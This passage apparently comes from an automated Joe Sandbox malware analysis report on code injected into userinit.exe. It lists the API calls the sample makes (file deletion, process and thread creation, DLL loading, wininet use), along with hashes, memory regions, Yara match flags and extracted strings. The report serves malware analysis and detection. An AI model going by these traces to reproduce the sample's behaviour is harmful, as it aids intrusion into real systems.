                                                      • Opcode Fuzzy Hash: 9748e708b96aa18100ac35f0450ba1d82ff0ea418837c52caf31f50557a53c81
                                                      • Instruction Fuzzy Hash: B32106B5A00208AFDB14DF98DD81FEFB7B9EF88300F108109F919A7240D774A9118BA1
                                                      APIs
                                                      • NtDeleteFile.NTDLL(2888A750), ref: 00AC9099
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 32f47c7f7706f169638fbfc647d15ffa62a41e2f99afdc25711ee14c5b4c1205
                                                      • Instruction ID: 9b39a6d6ad0482f6529e0862f6d65ff17fabe3d965d5f5a36c5338125283190a
                                                      • Opcode Fuzzy Hash: 32f47c7f7706f169638fbfc647d15ffa62a41e2f99afdc25711ee14c5b4c1205
                                                      • Instruction Fuzzy Hash: 831182B1510608BFD620EB68CC42FEF7BACDF89314F00814DFA19A7281D7757A158BA5
                                                      APIs
                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00AC90E7
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                      • Instruction ID: 7451c1613f599e1abf559094a5830292a0d7df6ef84ac3603e4ef2a214c25a73
                                                      • Opcode Fuzzy Hash: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                      • Instruction Fuzzy Hash: E0E046762002087FD620AA5ADC81F9B7BACDBC6764F418019FA09AB242C671B91587F5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 205ac3a381bb813e9c7082d4a7a17b6f7fa826acc4e700614dd64c116b742f9b
                                                      • Instruction ID: d3bdfa6c368042d784d79eec6a33c393121408c2cfb38c0f5ceee89d31ab18da
                                                      • Opcode Fuzzy Hash: 205ac3a381bb813e9c7082d4a7a17b6f7fa826acc4e700614dd64c116b742f9b
                                                      • Instruction Fuzzy Hash: 11900235615804129190B15C48C9546404597E0301B55C021E0424954C8B188A565361
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 76e0ff61dca9ccf8a099f69890ce22cb880f0f6984fac4b9143aa553188cfc78
                                                      • Instruction ID: 5a163635b1e153fd026380bde370488fa3cda0a724bd53d8fb9d04a30cc06344
                                                      • Opcode Fuzzy Hash: 76e0ff61dca9ccf8a099f69890ce22cb880f0f6984fac4b9143aa553188cfc78
                                                      • Instruction Fuzzy Hash: 8D900265611504424190B15C4849406604597E1301395C125A0554960C871C89559269
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e1ee8aa64a49252d3a5cf1582c2ffd94e399d963aa5d5d5796ff3641d45ae2dd
                                                      • Instruction ID: da8e7c649ff16bd1f5b470f82fc53bc69eb64b225085d4e25e527b40affaff43
                                                      • Opcode Fuzzy Hash: e1ee8aa64a49252d3a5cf1582c2ffd94e399d963aa5d5d5796ff3641d45ae2dd
                                                      • Instruction Fuzzy Hash: 2B900265212404034155B15C4459616404A87E0201B55C031E1014990DC62989916125
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0b87407b06c23aea52de3a2777273bf00e610581b1037ebe63a7a5532917ab2c
                                                      • Instruction ID: 855d3e0f358e6cf150bd45785b46909fc9c64f74c4a8746b2bda7073789727b1
                                                      • Opcode Fuzzy Hash: 0b87407b06c23aea52de3a2777273bf00e610581b1037ebe63a7a5532917ab2c
                                                      • Instruction Fuzzy Hash: 0490023561540C02D1A0B15C4459746004587D0301F55C021A0024A54D87598B5576A1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 39bd9350dd78e7b2ab660f662eed85876600ec323bc8d37487ce9b1e92eee2a8
                                                      • Instruction ID: abaa80255c87094508c0af53263213ab66ef062ffbf2780288835a53083c6f8a
                                                      • Opcode Fuzzy Hash: 39bd9350dd78e7b2ab660f662eed85876600ec323bc8d37487ce9b1e92eee2a8
                                                      • Instruction Fuzzy Hash: 1390023521140C02D1D0B15C444964A004587D1301F95C025A0025A54DCB198B5977A1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f2d03763a5b4564561e38c73f3880e0381bfc3141335a184227e7098e234c7ec
                                                      • Instruction ID: e22108af8686babd8a20ed67aad2e5667aa2c14b62ca3dd80ddeb4c71a6a0019
                                                      • Opcode Fuzzy Hash: f2d03763a5b4564561e38c73f3880e0381bfc3141335a184227e7098e234c7ec
                                                      • Instruction Fuzzy Hash: 1C90023521544C42D190B15C4449A46005587D0305F55C021A0064A94D97298E55B661
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 23aa6f0ae01d5af6d0616dd9ed9df34ebc1ab1e50ceb6c0c679426cc764049d5
                                                      • Instruction ID: 19fc3df69798d4d4243569a1076c843a6a7a71d968d7df839126e9409fa6dd7f
                                                      • Opcode Fuzzy Hash: 23aa6f0ae01d5af6d0616dd9ed9df34ebc1ab1e50ceb6c0c679426cc764049d5
                                                      • Instruction Fuzzy Hash: F6900229231404020195F55C064950B048597D6351395C025F1416990CC72589655321
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3bb70db22eae80e9586253e2941fbe2d14845cb3a553503471e372538e218e84
                                                      • Instruction ID: 1341958bd2ea48a6d1f00646a4a0c28cf58b72bca5920c76b75a30aebb7143ba
                                                      • Opcode Fuzzy Hash: 3bb70db22eae80e9586253e2941fbe2d14845cb3a553503471e372538e218e84
                                                      • Instruction Fuzzy Hash: 5B90043D331404030155F55C074D50700C7C7D5351355C031F1015D50CD735CD715131
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8f4439bb6e2bf922e784f685dd0ce966524ab3a4c0430e4df21a5e2160e522a1
                                                      • Instruction ID: 9341a1ced1b61bbff9d6da9db016f70e07537242e6af0d94fb9aefde7b2b1df4
                                                      • Opcode Fuzzy Hash: 8f4439bb6e2bf922e784f685dd0ce966524ab3a4c0430e4df21a5e2160e522a1
                                                      • Instruction Fuzzy Hash: D990026535140842D150B15C4459B060045C7E1301F55C025E1064954D871DCD526126
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3eb4646d90014330a23d511b9e2a51caf0dbdc7e58c4454bfcad7e48eb8b1f20
                                                      • Instruction ID: 2f5a034ce509b25da02b3fb696d31e800cb66d6be2e0d00c8f513f0eda3cf079
                                                      • Opcode Fuzzy Hash: 3eb4646d90014330a23d511b9e2a51caf0dbdc7e58c4454bfcad7e48eb8b1f20
                                                      • Instruction Fuzzy Hash: D6900225611404424190B16C88899064045ABE1211755C131A0998950D865D89655665

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 553 ab09e2-ab0a5a call acb250 call acbc60 call ab41d0 call aa1410 call ac18f0 564 ab0a7a-ab0a80 553->564 565 ab0a5c-ab0a6b PostThreadMessageW 553->565 565->564 566 ab0a6d-ab0a77 565->566 566->564
                                                      APIs
                                                      • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 00AB0A67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: A34E618M$A34E618M
                                                      • API String ID: 1836367815-3667986552
                                                      • Opcode ID: ec36e962493c55c13d92b3b05c6f1c4ef17b21ffc2821fd59ae206d085b6be5c
                                                      • Instruction ID: 074a4ee02e590c703d456b2714f841749747cff11267f507fe64384511ff2620
                                                      • Opcode Fuzzy Hash: ec36e962493c55c13d92b3b05c6f1c4ef17b21ffc2821fd59ae206d085b6be5c
                                                      • Instruction Fuzzy Hash: 2F11A0B2D4014C7EDB119BA48D82EEF7F7CAB55794F058058FA04A7242D6284E068BB1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 567 ab09f0-ab0a02 568 ab0a0a-ab0a5a call acbc60 call ab41d0 call aa1410 call ac18f0 567->568 569 ab0a05 call acb250 567->569 578 ab0a7a-ab0a80 568->578 579 ab0a5c-ab0a6b PostThreadMessageW 568->579 569->568 579->578 580 ab0a6d-ab0a77 579->580 580->578
                                                      APIs
                                                      • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 00AB0A67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: A34E618M$A34E618M
                                                      • API String ID: 1836367815-3667986552
                                                      • Opcode ID: a0db7f70ae73b62c3b521aa543ac46997ae0d35de7db09515e08ff1ed1aa0e27
                                                      • Instruction ID: deaa28aa240784e3869df994cc6c84d47292f8018280a7a4f986cdc4995a4bcf
                                                      • Opcode Fuzzy Hash: a0db7f70ae73b62c3b521aa543ac46997ae0d35de7db09515e08ff1ed1aa0e27
                                                      • Instruction Fuzzy Hash: 100184B1D4025C7EDB10A7E48C82EEFBB7CEF55794F058068FA04A7142D6285E068BB1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: 50885b1edb9e7b148e27d647e923dbd77f27874b4528f90006961c46233bcca0
                                                      • Instruction ID: 16f5a80990f15357a4b334e8e57f76f722f8b149991b3f79eee9606c6b09f96e
                                                      • Opcode Fuzzy Hash: 50885b1edb9e7b148e27d647e923dbd77f27874b4528f90006961c46233bcca0
                                                      • Instruction Fuzzy Hash: A43130B5A0060A9FDB00DFD8CC80DEEB7B9FF88304F148559E505EB215D775AE418BA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: 6a81704b8de6bab05823ed953bb4463d50ac1888c863c694621acfd6ca484a67
                                                      • Instruction ID: 6cd5b3ad624f785ee070ea5f3e37dd96772fd3653c995b56bbdd1aab8f576baa
                                                      • Opcode Fuzzy Hash: 6a81704b8de6bab05823ed953bb4463d50ac1888c863c694621acfd6ca484a67
                                                      • Instruction Fuzzy Hash: EE311EB5A0060A9FDB00DFD8CC809EEB7B9BF88304B148559E915AB215D775AE458BA0
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 00AC386B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: wininet.dll
                                                      • API String ID: 3472027048-3354682871
                                                      • Opcode ID: d3ee649aa51a6303ee889ca990ff9726971c79055851baaabdfcfc667915e533
                                                      • Instruction ID: c26f508df2ef021121529da1b64be8e047214b6009595f0dda911b94a4ae32bd
                                                      • Opcode Fuzzy Hash: d3ee649aa51a6303ee889ca990ff9726971c79055851baaabdfcfc667915e533
                                                      • Instruction Fuzzy Hash: 92316EB1A01705BBDB14DF64CC85FEBBBB8FB88700F04851DFA196B241D7706A408BA5
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AB4242
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AB4242
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,?,8BF2C41C,?,00AB7FEE,00000010,?,?,?,00000044,?,00000010,00AB7FEE,?,8BF2C41C,?), ref: 00AC9513
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00AA9B35
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00AA9B35
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00AB1689,?,00AC5CBB,00AB1689,00AC539F,00AC5CBB,?,00AB1689,00AC539F,00001000,?,?,00000000), ref: 00AC940C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D70B08E2,00000007,00000000,00000004,00000000,00AB3A48,000000F4), ref: 00AC945F
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00AB805C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00AB805C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00AB1990,00AC7CDF,00AC539F,00AB1956), ref: 00AB7E53
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309134301.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3230000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309134301.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3230000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-3754132690
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309134301.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3230000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -/OB$3/67$7R[:$BNJN$HLUH$I@[5$JMUJ$KUJB$M[S0$NUK[$OJ[6$OUOU$THNU$TNHL$UHM
                                                      • API String ID: 0-3939393268
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      Strings
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03394787
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03394742
                                                      • Execute=1, xrefs: 03394713
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03394655
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03394725
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033946FC
                                                      • ExecuteOptions, xrefs: 033946A0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
